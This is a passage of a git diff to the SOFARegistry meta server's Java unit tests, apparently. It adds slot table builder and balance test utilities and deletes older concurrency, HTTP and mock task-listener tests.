o2) { + return o1.getDataNode().compareTo(o2.getDataNode()); + } + }); + List actual = slotTableBuilder.getDataNodeSlotsLeaderBelow(6 / 3); + actual.sort( + new Comparator() { + @Override + public int compare(DataNodeSlot o1, DataNodeSlot o2) { + return o1.getDataNode().compareTo(o2.getDataNode()); + } + }); + Assert.assertEquals(expected, actual); + } + + @Test + public void testIncrEpoch() { + List dataNodes = randomDataNodes(6); + SlotTable slotTable = randomSlotTable(dataNodes); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(slotTable, 6, 2); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + long prevEpoch = slotTableBuilder.build().getEpoch(); + slotTableBuilder.incrEpoch(); + Assert.assertTrue(slotTableBuilder.build().getEpoch() > prevEpoch); + } + + @Test + public void testBuild() { + List dataNodes = randomDataNodes(6); + SlotTable slotTable = randomSlotTable(dataNodes); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(slotTable, 6, 2); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + long prevEpoch = slotTableBuilder.build().getEpoch(); + slotTableBuilder.incrEpoch(); + SlotTable slotTable1 = slotTableBuilder.build(); + assertSlotTableNoDupLeaderFollower(slotTable1); + } + + @Test + public void testGetDataNodeSlot() { + List dataNodes = randomDataNodes(6); + SlotTable slotTable = randomSlotTable(dataNodes); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(slotTable, 6, 2); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + DataNodeSlot dataNodeSlot = null; + try { + dataNodeSlot = slotTableBuilder.getDataNodeSlot(randomIp()); + // should not reach that + Assert.assertTrue(false); + } catch (IllegalArgumentException e) { + Assert.assertTrue(e.getMessage().contains("no DataNodeSlot for")); + } + Assert.assertNull(dataNodeSlot); + dataNodeSlot = slotTableBuilder.getDataNodeSlot(dataNodes.get(0).getIp()); + Assert.assertNotNull(dataNodeSlot); + logger.info("[slotTableBuilder] {}", slotTableBuilder.toString()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/BaseTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/BaseTest.java deleted file mode 100644 index cd751ec3c..000000000 --- a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/BaseTest.java +++ /dev/null @@ -1,28 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.test; - -import org.springframework.boot.SpringBootConfiguration; - -/** - * - * @author shangyu.wh - * @version $Id: BaseTest.java, v 0.1 2017-12-14 21:47 shangyu.wh Exp $ - */ -@SpringBootConfiguration -public class BaseTest { -} \ No newline at end of file diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/ConcurrentTestUtil.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/ConcurrentTestUtil.java deleted file mode 100644 index 44bacff98..000000000 --- a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/ConcurrentTestUtil.java +++ /dev/null @@ -1,71 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.test; - -import java.util.ArrayList; -import java.util.Collections; -import java.util.List; -import java.util.concurrent.CountDownLatch; -import java.util.concurrent.ExecutorService; -import java.util.concurrent.Executors; -import java.util.concurrent.TimeUnit; - -import static org.junit.Assert.assertTrue; - -/** - * - * @author shangyu.wh - * @version $Id: ConcurrentTestUtil.java, v 0.1 2018-08-14 22:33 shangyu.wh Exp $ - */ -public class ConcurrentTestUtil { - public static void assertConcurrent(final String message, - final List runnables, - final int maxTimeoutSeconds) throws InterruptedException { - final int numThreads = runnables.size(); - final List exceptions = Collections.synchronizedList(new ArrayList()); - final ExecutorService threadPool = Executors.newFixedThreadPool(numThreads); - try { - final CountDownLatch allExecutorThreadsReady = new CountDownLatch(numThreads); - final CountDownLatch afterInitBlocker = new CountDownLatch(1); - final CountDownLatch allDone = new CountDownLatch(numThreads); - for (final Runnable submittedTestRunnable : runnables) { - threadPool.submit(() -> { - allExecutorThreadsReady.countDown(); - try { - afterInitBlocker.await(); - submittedTestRunnable.run(); - } catch (final Throwable e) { - exceptions.add(e); - } finally { - allDone.countDown(); - } - }); - } - // wait until all threads are ready - assertTrue( - "Timeout initializing threads! Perform long lasting initializations before passing runnables to assertConcurrent", - allExecutorThreadsReady.await(runnables.size() * 10, TimeUnit.MILLISECONDS)); - // start all test runners - afterInitBlocker.countDown(); - assertTrue(message + " timeout! More than" + maxTimeoutSeconds + "seconds", - allDone.await(maxTimeoutSeconds, TimeUnit.SECONDS)); - } finally { - threadPool.shutdownNow(); - } - assertTrue(message + "failed with exception(s)" + exceptions, exceptions.isEmpty()); - } -} \ No newline at end of file diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/HttpTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/HttpTest.java deleted file mode 100644 index 22683950e..000000000 --- a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/HttpTest.java +++ /dev/null @@ -1,94 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.test; - -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.core.model.Result; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.jersey.JerseyClient; -import com.alipay.sofa.registry.server.meta.MetaApplication; -import com.alipay.sofa.registry.server.meta.bootstrap.EnableMetaServer; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig.DecisionMode; -import org.apache.commons.io.FileUtils; -import org.junit.BeforeClass; -import org.junit.Test; -import org.junit.runner.RunWith; -import org.springframework.boot.test.context.SpringBootTest; -import org.springframework.test.context.junit4.SpringRunner; - -import javax.ws.rs.client.Entity; -import javax.ws.rs.core.MediaType; -import javax.ws.rs.core.UriBuilder; -import java.io.File; -import java.net.HttpURLConnection; -import java.net.URI; - -import static org.junit.Assert.assertEquals; -import static org.junit.Assert.assertTrue; - -/** - * - * @author shangyu.wh - * @version $Id: HttpTest.java, v 0.1 2018-02-01 17:01 shangyu.wh Exp $ - */ -@RunWith(SpringRunner.class) -@SpringBootTest(classes = MetaApplication.class) -@EnableMetaServer -public class HttpTest extends BaseTest { - - @BeforeClass - public static void beforeClass() throws Exception { - System.setProperty("nodes.metaNode", "registry-stable:" - + NetUtil.getLocalAddress().getHostAddress()); - System.setProperty("nodes.localDataCenter", "registry-stable"); - FileUtils.deleteDirectory(new File(System.getProperty("user.home") + File.separator - + "raftData")); - } - - @Test - public void testDecisionMode() { - URL url = new URL(NetUtil.getLocalAddress().getHostAddress(), 9615); - JerseyClient jerseyClient = JerseyClient.getInstance(); - Channel channel = jerseyClient.connect(url); - Result response = channel.getWebTarget().path("decisionMode").request() - .post(Entity.entity(DecisionMode.OFF, MediaType.APPLICATION_JSON), Result.class); - - assertTrue(response.isSuccess()); - } - - @Test - public void testConnect() throws Exception { - URL targetUrl = new URL(NetUtil.getLocalAddress().getHostAddress(), 9615); - java.net.URL urlnet = new java.net.URL("http", targetUrl.getIpAddress(), - targetUrl.getPort(), ""); - URI uri = urlnet.toURI(); - java.net.URL getUrl = UriBuilder.fromUri(uri).path("decisionMode").build().toURL(); - - HttpURLConnection connection = (HttpURLConnection) getUrl.openConnection(); - try { - connection.setDoOutput(true); - connection.setInstanceFollowRedirects(false); - connection.setRequestMethod("POST"); - connection.setRequestProperty("Content-Type", MediaType.APPLICATION_JSON); - - assertEquals(HttpURLConnection.HTTP_OK, connection.getResponseCode()); - } finally { - connection.disconnect(); - } - } -} \ No newline at end of file diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/ProcessResponseTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/ProcessResponseTest.java deleted file mode 100644 index f9c7b93ff..000000000 --- a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/ProcessResponseTest.java +++ /dev/null @@ -1,64 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.test; - -import com.alipay.sofa.registry.jraft.command.ProcessResponse; -import org.junit.Test; - -import java.util.ArrayList; -import java.util.List; -import java.util.concurrent.atomic.AtomicInteger; - -/** - * - * @author shangyu.wh - * @version $Id: ProcessResponseTest.java, v 0.1 2018-08-14 22:20 shangyu.wh Exp $ - */ -public class ProcessResponseTest { - - @Test - public void testProcessResponse() throws InterruptedException { - - int number = 500; - - AtomicInteger count = new AtomicInteger(); - List list = new ArrayList(); - for (int i = 0; i < number; i++) { - if (i % 2 == 0) { - list.add(() -> { - ProcessResponse response = ProcessResponse.fail("Can not find service %s from process!").build(); - if (response != null) { - if (!response.getSuccess()) { - count.incrementAndGet(); - } - } - }); - } else { - list.add(() -> { - ProcessResponse response = ProcessResponse.ok("Can not find service %s from process!").build(); - if (response != null) { - if (response.getSuccess()) { - count.incrementAndGet(); - } - } - }); - } - - } - ConcurrentTestUtil.assertConcurrent("多线程build序列化", list, 10); - } -} \ No newline at end of file diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/confirm/DataNodeChangePushTaskListenerMock.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/confirm/DataNodeChangePushTaskListenerMock.java deleted file mode 100644 index 162df86cd..000000000 --- a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/confirm/DataNodeChangePushTaskListenerMock.java +++ /dev/null @@ -1,79 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.test.confirm; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.server.meta.store.DataStoreService; -import com.alipay.sofa.registry.server.meta.task.Constant; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; - -import java.util.Collection; -import java.util.Map; -import java.util.concurrent.ExecutorService; -import java.util.concurrent.Executors; - -/** - * - * @author shangyu.wh - * @version $Id: DataNodeChangePushTaskListenerMoke.java, v 0.1 2018-03-28 16:20 shangyu.wh Exp $ - */ -public class DataNodeChangePushTaskListenerMock implements TaskListener { - - private DataStoreService dataStoreService; - - private Collection removeNodes; - - public DataNodeChangePushTaskListenerMock(DataStoreService dataStoreService, - Collection removeNodes) { - this.dataStoreService = dataStoreService; - this.removeNodes = removeNodes; - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.DATA_NODE_CHANGE_PUSH_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - - NodeType nodeType = (NodeType) event.getAttribute(Constant.PUSH_TARGET_TYPE); - String ip = (String) event.getAttribute(Constant.PUSH_TARGET_CONFIRM_NODE); - - Map targetNodes = (Map) event - .getAttribute(Constant.PUSH_TARGET_DATA_NODE); - switch (nodeType) { - case SESSION: - break; - case DATA: - final ExecutorService threadPool = Executors.newSingleThreadExecutor(); - try { - threadPool.submit(() -> targetNodes.forEach((address, dataNode) -> { - if (removeNodes == null || !removeNodes.contains(address)) { - dataStoreService.confirmNodeStatus(address, ip); - } - })); - break; - } finally { - threadPool.shutdown(); - } - } - } -} \ No newline at end of file diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/confirm/DataServerConfirmTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/confirm/DataServerConfirmTest.java deleted file mode 100644 index 077c2a311..000000000 --- a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/confirm/DataServerConfirmTest.java +++ /dev/null @@ -1,177 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.test.confirm; - -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig.DecisionMode; -import com.alipay.sofa.registry.server.meta.bootstrap.NodeConfig; -import com.alipay.sofa.registry.server.meta.repository.service.DataConfirmStatusService; -import com.alipay.sofa.registry.server.meta.repository.service.DataRepositoryService; -import com.alipay.sofa.registry.server.meta.store.DataStoreService; -import com.alipay.sofa.registry.task.listener.DefaultTaskListenerManager; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import com.alipay.sofa.registry.task.scheduler.TimedSupervisorTask; -import org.junit.Test; - -import java.util.Collection; -import java.util.concurrent.CopyOnWriteArrayList; -import java.util.concurrent.CountDownLatch; -import java.util.concurrent.ExecutorService; -import java.util.concurrent.Executors; -import java.util.concurrent.ScheduledExecutorService; -import java.util.concurrent.SynchronousQueue; -import java.util.concurrent.ThreadPoolExecutor; -import java.util.concurrent.TimeUnit; - -import static org.junit.Assert.assertTrue; -import static org.mockito.Mockito.mock; -import static org.mockito.Mockito.when; - -/** - * - * @author shangyu.wh - * @version $Id: DataServerConfirmTest.java, v 0.1 2018-03-27 17:13 shangyu.wh Exp $ - */ -public class DataServerConfirmTest { - - @Test - public void testDataServerRegisterConfirm() throws InterruptedException { - - DataStoreService dataStoreService = new DataStoreService(); - - DataConfirmStatusService dataConfirmStatusService = new DataConfirmStatusService(); - - NodeConfig nodeConfig = mock(NodeConfig.class); - MetaServerConfig metaServerConfig = mock(MetaServerConfig.class); - TaskListenerManager taskListenerManager = new DefaultTaskListenerManager(); - taskListenerManager - .addTaskListener(new DataNodeChangePushTaskListenerMock(dataStoreService, null)); - taskListenerManager.addTaskListener(new ReceiveStatusConfirmNotifyTaskMock()); - - dataStoreService.setNodeConfig(nodeConfig); - dataStoreService.setTaskListenerManager(taskListenerManager); - dataStoreService.setDataConfirmStatusService(dataConfirmStatusService); - - DataRepositoryService dataRepositoryService = new DataRepositoryService(); - dataRepositoryService.setNodeConfig(nodeConfig); - dataStoreService.setDataRepositoryService(dataRepositoryService); - - when(nodeConfig.getLocalDataCenter()).thenReturn("DefaultDataCenter"); - when(metaServerConfig.getDecisionMode()).thenReturn(DecisionMode.RUNTIME); - - //dataStoreService.pushDataNodeListChange(); - start(dataStoreService); - - int numThreads = 10; - final CountDownLatch allDone = new CountDownLatch(numThreads); - final ExecutorService threadPool = Executors.newFixedThreadPool(numThreads); - - for (int i = 0; i < numThreads; i++) { - final int n = i; - threadPool.execute(() -> dataStoreService.addNode(new NodeTest(new URL("192.168.0." + n, 0), allDone))); - } - - assertTrue(" timeout! More than" + 60 + "seconds,allDone:" + allDone.getCount(), - allDone.await(60, TimeUnit.SECONDS)); - } - - @Test - public void testDataServerRegisterConfirmWithRemove() throws InterruptedException { - - DataStoreService dataStoreService = new DataStoreService(); - DataConfirmStatusService dataConfirmStatusService = new DataConfirmStatusService(); - NodeConfig nodeConfig = mock(NodeConfig.class); - MetaServerConfig metaServerConfig = mock(MetaServerConfig.class); - TaskListenerManager taskListenerManager = new DefaultTaskListenerManager(); - - Collection removeNodes = new CopyOnWriteArrayList<>(); - - removeNodes.add("192.168.0.4"); - removeNodes.add("192.168.0.5"); - removeNodes.add("192.168.0.17"); - removeNodes.add("192.168.0.21"); - removeNodes.add("192.168.0.10"); - removeNodes.add("192.168.0.24"); - - taskListenerManager - .addTaskListener(new DataNodeChangePushTaskListenerMock(dataStoreService, removeNodes)); - taskListenerManager.addTaskListener(new ReceiveStatusConfirmNotifyTaskMock()); - - dataStoreService.setNodeConfig(nodeConfig); - dataStoreService.setTaskListenerManager(taskListenerManager); - dataStoreService.setDataConfirmStatusService(dataConfirmStatusService); - - DataRepositoryService dataRepositoryService = new DataRepositoryService(); - dataRepositoryService.setNodeConfig(nodeConfig); - dataStoreService.setDataRepositoryService(dataRepositoryService); - - when(nodeConfig.getLocalDataCenter()).thenReturn("DefaultDataCenter"); - when(metaServerConfig.getDecisionMode()).thenReturn(DecisionMode.RUNTIME); - - //dataStoreService.pushDataNodeListChange(); - start(dataStoreService); - int numThreads = 10; - //done number = node - final CountDownLatch allDone = new CountDownLatch(numThreads); - final ExecutorService threadPool = Executors.newFixedThreadPool(numThreads); - try { - - for (int i = 0; i < numThreads; i++) { - final int n = i; - threadPool.execute(() -> dataStoreService.addNode(new NodeTest(new URL("192.168.0." + n, 0), allDone))); - } - TimeUnit.MILLISECONDS.sleep(2000); - removeNodes.forEach(dataStoreService::removeNode); - - assertTrue(" timeout! More than" + 60 + "seconds, allDone:" + allDone.getCount(), - allDone.await(60, TimeUnit.SECONDS)); - } finally { - threadPool.shutdown(); - } - } - - private void start(DataStoreService dataStoreService) { - - ScheduledExecutorService scheduler = Executors.newScheduledThreadPool(4); - ThreadPoolExecutor checkDataNodeListChangeExecutor = new ThreadPoolExecutor(1, 2, - 0, TimeUnit.SECONDS, new SynchronousQueue<>()); - - scheduler.schedule(new TimedSupervisorTask("CheckDataNodeListChange", scheduler, - checkDataNodeListChangeExecutor, 500, TimeUnit.MILLISECONDS, 3, - dataStoreService::pushNodeListChange), 1, TimeUnit.SECONDS); - } - - class NodeTest extends DataNode { - private final CountDownLatch allDone; - - public NodeTest(URL nodeUrl, CountDownLatch allDone) { - super(nodeUrl, "DefaultDataCenter"); - this.allDone = allDone; - } - - /** - * Getter method for property allDone. - * - * @return property value of allDone - */ - public CountDownLatch getAllDone() { - return allDone; - } - } -} \ No newline at end of file diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/confirm/ReceiveStatusConfirmNotifyTaskMock.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/confirm/ReceiveStatusConfirmNotifyTaskMock.java deleted file mode 100644 index bbdf33c62..000000000 --- a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/confirm/ReceiveStatusConfirmNotifyTaskMock.java +++ /dev/null @@ -1,52 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.test.confirm; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.test.confirm.DataServerConfirmTest.NodeTest; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; - -/** - * - * @author shangyu.wh - * @version $Id: ReceiveStatusConfirmNotifyTaskMock.java, v 0.1 2018-03-28 16:38 shangyu.wh Exp $ - */ -public class ReceiveStatusConfirmNotifyTaskMock implements TaskListener { - - private static final Logger LOGGER = LoggerFactory.getLogger( - ReceiveStatusConfirmNotifyTaskMock.class, "[Task]"); - - @Override - public boolean support(TaskEvent event) { - return TaskType.RECEIVE_STATUS_CONFIRM_NOTIFY_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - Object obj = event.getEventObj(); - - if (obj instanceof NodeTest) { - ((NodeTest) obj).getAllDone().countDown(); - LOGGER.info("Notify:{}", ((NodeTest) obj)); - } else { - throw new IllegalArgumentException("Input task event object error!"); - } - } -} \ No newline at end of file diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/confirm/SessionNodeChangePushTaskMock.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/confirm/SessionNodeChangePushTaskMock.java deleted file mode 100644 index 8861c623a..000000000 --- a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/test/confirm/SessionNodeChangePushTaskMock.java +++ /dev/null @@ -1,72 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.test.confirm; - -import com.alipay.sofa.registry.common.model.metaserver.SessionNode; -import com.alipay.sofa.registry.server.meta.store.SessionStoreService; -import com.alipay.sofa.registry.server.meta.task.Constant; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; - -import java.util.Collection; -import java.util.Map; -import java.util.concurrent.ExecutorService; -import java.util.concurrent.Executors; - -/** - * - * @author shangyu.wh - * @version $Id: SessionNodeChangePushTask.java, v 0.1 2018-01-15 16:12 shangyu.wh Exp $ - */ -public class SessionNodeChangePushTaskMock implements TaskListener { - - private SessionStoreService sessionStoreService; - - private Collection removeNodes; - - public SessionNodeChangePushTaskMock(SessionStoreService sessionStoreService, - Collection removeNodes) { - this.sessionStoreService = sessionStoreService; - this.removeNodes = removeNodes; - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.SESSION_NODE_CHANGE_PUSH_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - Map targetNodes = (Map) event - .getAttribute(Constant.PUSH_TARGET_SESSION_NODE); - - String ip = (String) event.getAttribute(Constant.PUSH_TARGET_CONFIRM_NODE); - final ExecutorService threadPool = Executors.newSingleThreadExecutor(); - try { - - threadPool.submit(() -> targetNodes.forEach((address, dataNode) -> { - - if (removeNodes == null || !removeNodes.contains(address)) { - sessionStoreService.confirmNodeStatus(address, ip); - } - })); - } finally { - threadPool.shutdown(); - } - } -} \ No newline at end of file diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/shared/slot/DiskSlotTableRecorderTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/shared/slot/DiskSlotTableRecorderTest.java new file mode 100644 index 000000000..2356f098a --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/shared/slot/DiskSlotTableRecorderTest.java @@ -0,0 +1,40 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.slot; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import java.util.List; +import org.assertj.core.util.Lists; +import org.junit.Test; + +public class DiskSlotTableRecorderTest extends AbstractMetaServerTestBase { + + private DiskSlotTableRecorder recorder = new DiskSlotTableRecorder(); + + @Test + public void testRecord() { + List dataNodes = + Lists.newArrayList( + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc())); + SlotTable slotTable = new SlotTableGenerator(dataNodes).createSlotTable(); + recorder.record(slotTable); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/test/TestUtils.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/test/TestUtils.java new file mode 100644 index 000000000..1a8d0fcea --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/test/TestUtils.java @@ -0,0 +1,143 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.test; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.server.meta.slot.balance.NaiveBalancePolicy; +import com.alipay.sofa.registry.server.shared.slot.SlotTableUtils; +import com.alipay.sofa.registry.util.MathUtils; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.collect.Lists; +import java.util.List; +import java.util.Map; +import java.util.concurrent.atomic.AtomicInteger; +import org.junit.Assert; + +public final class TestUtils { + private static final AtomicInteger IP_INT = new AtomicInteger(); + + private TestUtils() {} + + public static List createDataNodes(int num) { + List list = Lists.newArrayList(); + for (int i = 0; i < num; i++) { + String ip = int2Ip(IP_INT.incrementAndGet()); + list.add(new DataNode(new URL(ip, 9600), getDc())); + } + return list; + } + + public static void assertBalance( + SlotTable slotTable, + List dataNodes, + int slotNum, + int replicas, + boolean checkLowLeader, + String tag) { + Assert.assertTrue(SlotTableUtils.isValidSlotTable(slotTable)); + Map leaderCount = SlotTableUtils.getSlotTableLeaderCount(slotTable); + Map followerCount = SlotTableUtils.getSlotTableFollowerCount(slotTable); + Assert.assertEquals(dataNodes.size(), leaderCount.size()); + Assert.assertTrue(leaderCount.keySet().containsAll(dataNodes)); + if (dataNodes.size() > 1) { + Assert.assertEquals(dataNodes.size(), followerCount.size()); + Assert.assertTrue(followerCount.keySet().containsAll(dataNodes)); + } + + int leaderHighAvg = MathUtils.divideCeil(slotNum, dataNodes.size()); + leaderHighAvg = new NaiveBalancePolicy().getHighWaterMarkSlotLeaderNums(leaderHighAvg); + int leaderLowAvg = Math.floorDiv(slotNum, dataNodes.size()); + leaderLowAvg = new NaiveBalancePolicy().getLowWaterMarkSlotLeaderNums(leaderLowAvg); + for (Map.Entry e : leaderCount.entrySet()) { + String k = e.getKey(); + int v = e.getValue(); + 